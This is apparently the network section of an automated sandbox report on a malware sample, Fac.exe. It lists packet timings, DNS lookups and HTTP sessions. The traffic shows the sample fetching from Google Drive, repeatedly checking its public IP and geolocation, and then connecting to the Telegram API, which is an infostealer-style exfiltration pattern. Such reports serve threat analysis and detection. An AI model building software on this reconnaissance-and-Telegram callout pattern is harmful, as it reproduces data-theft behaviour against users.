Nov 18, 2024 14:53:23.436469078 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.436521053 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.436747074 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.437633991 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.437865973 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.437916040 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.438210964 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.438858986 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.439096928 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.439148903 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.439377069 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.440474033 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.440711021 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.440761089 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.441116095 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.441735983 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.441977024 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.442028999 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.442339897 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.443103075 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.443281889 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.443337917 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.443578005 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.443639040 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.443855047 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.443855047 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.755037069 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.755124092 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:24.313030005 CET	49769	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:24.489288092 CET	80	49769	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:24.489595890 CET	49769	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:24.489695072 CET	49769	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:24.665905952 CET	80	49769	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:24.667363882 CET	80	49769	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:24.670850992 CET	49769	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:24.847763062 CET	80	49769	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:24.895411968 CET	49769	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:25.508158922 CET	49770	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:25.508246899 CET	443	49770	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:25.508443117 CET	49770	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:25.510246992 CET	49770	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:25.510288000 CET	443	49770	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:25.732515097 CET	443	49770	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:25.732744932 CET	49770	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:25.734843969 CET	49770	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:25.734891891 CET	443	49770	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:25.736083984 CET	443	49770	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:25.738887072 CET	49770	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:25.783994913 CET	443	49770	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:26.291595936 CET	443	49770	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:26.291738987 CET	443	49770	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:26.291871071 CET	49770	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:26.294104099 CET	49770	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:26.304378033 CET	49769	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:26.481703043 CET	80	49769	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:26.483279943 CET	49771	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:26.483369112 CET	443	49771	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:26.483576059 CET	49771	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:26.483766079 CET	49771	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:26.483814001 CET	443	49771	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:26.535621881 CET	49769	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:26.686861992 CET	443	49771	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:26.688442945 CET	49771	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:26.688532114 CET	443	49771	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:26.948362112 CET	443	49771	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:26.948554039 CET	443	49771	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:26.948705912 CET	49771	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:26.948894978 CET	49771	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:26.951277971 CET	49769	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:26.951906919 CET	49772	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:27.127594948 CET	80	49769	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:27.127741098 CET	49769	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:27.128458023 CET	80	49772	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:27.128654003 CET	49772	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:27.128959894 CET	49772	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:27.305567026 CET	80	49772	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:27.306387901 CET	80	49772	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:27.307434082 CET	49773	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:27.307480097 CET	443	49773	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:27.307746887 CET	49773	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:27.307842970 CET	49773	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:27.307857037 CET	443	49773	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:27.348298073 CET	49772	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:27.511213064 CET	443	49773	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:27.512554884 CET	49773	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:27.512614012 CET	443	49773	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:27.763216019 CET	443	49773	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:27.763380051 CET	443	49773	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:27.763513088 CET	49773	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:27.763675928 CET	49773	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:27.766877890 CET	49774	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:27.943120956 CET	80	49774	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:27.943613052 CET	49774	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:27.943613052 CET	49774	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:28.119910955 CET	80	49774	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:28.120629072 CET	80	49774	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:28.121546984 CET	49775	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:28.121622086 CET	443	49775	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:28.121817112 CET	49775	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:28.121922016 CET	49775	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:28.121956110 CET	443	49775	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:28.176182985 CET	49774	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:28.318522930 CET	443	49775	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:28.320003986 CET	49775	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:28.320043087 CET	443	49775	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:28.562407017 CET	443	49775	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:28.562573910 CET	443	49775	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:28.562755108 CET	49775	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:28.563009977 CET	49775	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:28.566178083 CET	49774	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:28.566621065 CET	49776	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:28.742779016 CET	80	49774	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:28.742844105 CET	80	49776	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:28.743400097 CET	49774	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:28.743400097 CET	49776	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:28.743401051 CET	49776	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:28.920186043 CET	80	49776	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:28.920825958 CET	80	49776	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:28.922503948 CET	49777	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:28.922614098 CET	443	49777	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:28.923185110 CET	49777	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:28.923186064 CET	49777	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:28.923330069 CET	443	49777	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:28.972853899 CET	49776	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:29.128815889 CET	443	49777	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:29.130317926 CET	49777	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:29.130377054 CET	443	49777	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:29.375447989 CET	443	49777	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:29.375624895 CET	443	49777	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:29.375811100 CET	49777	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:29.375996113 CET	49777	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:29.378418922 CET	49776	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:29.379142046 CET	49778	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:29.554624081 CET	80	49776	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:29.555269003 CET	49776	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:29.555605888 CET	80	49778	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:29.556179047 CET	49778	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:29.557046890 CET	49778	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:29.733509064 CET	80	49778	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:29.734142065 CET	80	49778	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:29.735038996 CET	49779	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:29.735122919 CET	443	49779	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:29.735384941 CET	49779	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:29.735527992 CET	49779	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:29.735553026 CET	443	49779	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:29.784924984 CET	49778	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:29.942110062 CET	443	49779	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:29.943439960 CET	49779	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:29.943499088 CET	443	49779	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:30.190751076 CET	443	49779	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:30.190913916 CET	443	49779	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:30.191071033 CET	49779	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:30.191267014 CET	49779	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:30.193490982 CET	49778	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:30.194212914 CET	49780	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:30.369771957 CET	80	49778	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:30.370002031 CET	49778	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:30.370682955 CET	80	49780	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:30.370846987 CET	49780	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:30.370964050 CET	49780	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:30.547523022 CET	80	49780	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:30.547996044 CET	80	49780	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:30.549123049 CET	49781	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:30.549235106 CET	443	49781	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:30.549837112 CET	49781	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:30.549837112 CET	49781	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:30.549993038 CET	443	49781	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:30.597338915 CET	49780	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:30.754877090 CET	443	49781	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:30.756164074 CET	49781	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:30.756221056 CET	443	49781	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:31.009711981 CET	443	49781	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:31.009867907 CET	443	49781	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:31.010054111 CET	49781	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:31.010211945 CET	49781	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:31.012592077 CET	49780	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:31.013199091 CET	49782	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:31.189038038 CET	80	49780	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:31.189250946 CET	49780	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:31.189265966 CET	80	49782	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:31.189502954 CET	49782	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:31.189558983 CET	49782	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:31.365530968 CET	80	49782	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:31.366276979 CET	80	49782	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:31.367130041 CET	49783	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:31.367146015 CET	443	49783	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:31.367301941 CET	49783	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:31.367496967 CET	49783	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:31.367506027 CET	443	49783	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:31.409615993 CET	49782	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:31.563544035 CET	443	49783	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:31.565289974 CET	49783	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:31.565304041 CET	443	49783	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:31.823520899 CET	443	49783	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:31.823690891 CET	443	49783	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:31.823863029 CET	49783	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:31.824012041 CET	49783	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:31.826129913 CET	49782	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:31.826805115 CET	49784	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:32.003249884 CET	80	49784	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:32.003465891 CET	49784	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:32.003535986 CET	49784	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:32.013060093 CET	80	49782	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:32.013233900 CET	49782	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:32.179862022 CET	80	49784	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:32.357707024 CET	80	49784	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:32.358671904 CET	49785	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:32.358715057 CET	443	49785	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:32.359050035 CET	49785	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:32.359097004 CET	49785	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:32.359110117 CET	443	49785	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:32.409527063 CET	49784	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:32.564516068 CET	443	49785	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:32.565939903 CET	49785	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:32.566026926 CET	443	49785	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:32.808332920 CET	443	49785	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:32.808504105 CET	443	49785	104.21.67.152	192.168.11.20
Nov 18, 2024 14:53:32.808728933 CET	49785	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:32.808921099 CET	49785	443	192.168.11.20	104.21.67.152
Nov 18, 2024 14:53:32.893444061 CET	49784	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:32.989551067 CET	49786	443	192.168.11.20	149.154.167.220
Nov 18, 2024 14:53:32.989617109 CET	443	49786	149.154.167.220	192.168.11.20
Nov 18, 2024 14:53:32.989814043 CET	49786	443	192.168.11.20	149.154.167.220
Nov 18, 2024 14:53:32.990139008 CET	49786	443	192.168.11.20	149.154.167.220
Nov 18, 2024 14:53:32.990185976 CET	443	49786	149.154.167.220	192.168.11.20
Nov 18, 2024 14:53:33.070261955 CET	80	49784	193.122.6.168	192.168.11.20
Nov 18, 2024 14:53:33.070488930 CET	49784	80	192.168.11.20	193.122.6.168
Nov 18, 2024 14:53:33.337203979 CET	443	49786	149.154.167.220	192.168.11.20
Nov 18, 2024 14:53:33.337549925 CET	49786	443	192.168.11.20	149.154.167.220
Nov 18, 2024 14:53:33.338804960 CET	49786	443	192.168.11.20	149.154.167.220
Nov 18, 2024 14:53:33.338814974 CET	443	49786	149.154.167.220	192.168.11.20
Nov 18, 2024 14:53:33.339046001 CET	443	49786	149.154.167.220	192.168.11.20
Nov 18, 2024 14:53:33.340218067 CET	49786	443	192.168.11.20	149.154.167.220
Nov 18, 2024 14:53:33.383960009 CET	443	49786	149.154.167.220	192.168.11.20
Nov 18, 2024 14:53:33.674050093 CET	443	49786	149.154.167.220	192.168.11.20
Nov 18, 2024 14:53:33.674158096 CET	443	49786	149.154.167.220	192.168.11.20
Nov 18, 2024 14:53:33.674376011 CET	49786	443	192.168.11.20	149.154.167.220
Nov 18, 2024 14:53:33.676600933 CET	49786	443	192.168.11.20	149.154.167.220
Nov 18, 2024 14:53:39.680761099 CET	49772	80	192.168.11.20	193.122.6.168

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 18, 2024 14:53:19.600836039 CET	55678	53	192.168.11.20	1.1.1.1
Nov 18, 2024 14:53:19.696208954 CET	53	55678	1.1.1.1	192.168.11.20
Nov 18, 2024 14:53:20.167694092 CET	54711	53	192.168.11.20	1.1.1.1
Nov 18, 2024 14:53:20.262243986 CET	53	54711	1.1.1.1	192.168.11.20
Nov 18, 2024 14:53:24.214453936 CET	62089	53	192.168.11.20	1.1.1.1
Nov 18, 2024 14:53:24.309513092 CET	53	62089	1.1.1.1	192.168.11.20
Nov 18, 2024 14:53:25.412245989 CET	56691	53	192.168.11.20	1.1.1.1
Nov 18, 2024 14:53:25.507441044 CET	53	56691	1.1.1.1	192.168.11.20
Nov 18, 2024 14:53:32.894001961 CET	55383	53	192.168.11.20	1.1.1.1
Nov 18, 2024 14:53:32.988809109 CET	53	55383	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 18, 2024 14:53:19.600836039 CET	192.168.11.20	1.1.1.1	0x1c83	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Nov 18, 2024 14:53:20.167694092 CET	192.168.11.20	1.1.1.1	0x91b	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Nov 18, 2024 14:53:24.214453936 CET	192.168.11.20	1.1.1.1	0xc71c	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 18, 2024 14:53:25.412245989 CET	192.168.11.20	1.1.1.1	0x5466	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Nov 18, 2024 14:53:32.894001961 CET	192.168.11.20	1.1.1.1	0x8e07	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 18, 2024 14:53:19.696208954 CET	1.1.1.1	192.168.11.20	0x1c83	No error (0)	drive.google.com		142.251.41.14	A (IP address)	IN (0x0001)	false
Nov 18, 2024 14:53:20.262243986 CET	1.1.1.1	192.168.11.20	0x91b	No error (0)	drive.usercontent.google.com		142.250.72.97	A (IP address)	IN (0x0001)	false
Nov 18, 2024 14:53:24.309513092 CET	1.1.1.1	192.168.11.20	0xc71c	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 18, 2024 14:53:24.309513092 CET	1.1.1.1	192.168.11.20	0xc71c	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 18, 2024 14:53:24.309513092 CET	1.1.1.1	192.168.11.20	0xc71c	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 18, 2024 14:53:24.309513092 CET	1.1.1.1	192.168.11.20	0xc71c	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 18, 2024 14:53:24.309513092 CET	1.1.1.1	192.168.11.20	0xc71c	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 18, 2024 14:53:24.309513092 CET	1.1.1.1	192.168.11.20	0xc71c	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 18, 2024 14:53:25.507441044 CET	1.1.1.1	192.168.11.20	0x5466	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Nov 18, 2024 14:53:25.507441044 CET	1.1.1.1	192.168.11.20	0x5466	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Nov 18, 2024 14:53:32.988809109 CET	1.1.1.1	192.168.11.20	0x8e07	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49769	193.122.6.168	80	6840	C:\Users\user\Desktop\Fac.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 14:53:24.489695072 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 14:53:24.667363882 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 13:53:24 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 71264ab0a324035bfb5c3e2ea8dd2fa4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 31 39 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.191</body></html>
Nov 18, 2024 14:53:24.670850992 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 14:53:24.847763062 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 13:53:24 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1159188e558b9ceabfe2e626ff83b002 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 31 39 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.191</body></html>
Nov 18, 2024 14:53:26.304378033 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 14:53:26.481703043 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 13:53:26 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5757a9176c570d06b781c88c1b8816dc Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 31 39 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.191</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49772	193.122.6.168	80	6840	C:\Users\user\Desktop\Fac.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 14:53:27.128959894 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 14:53:27.306387901 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 13:53:27 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2e895a3fe4bccef755be3c796b1aa16c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 31 39 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.191</body></html>

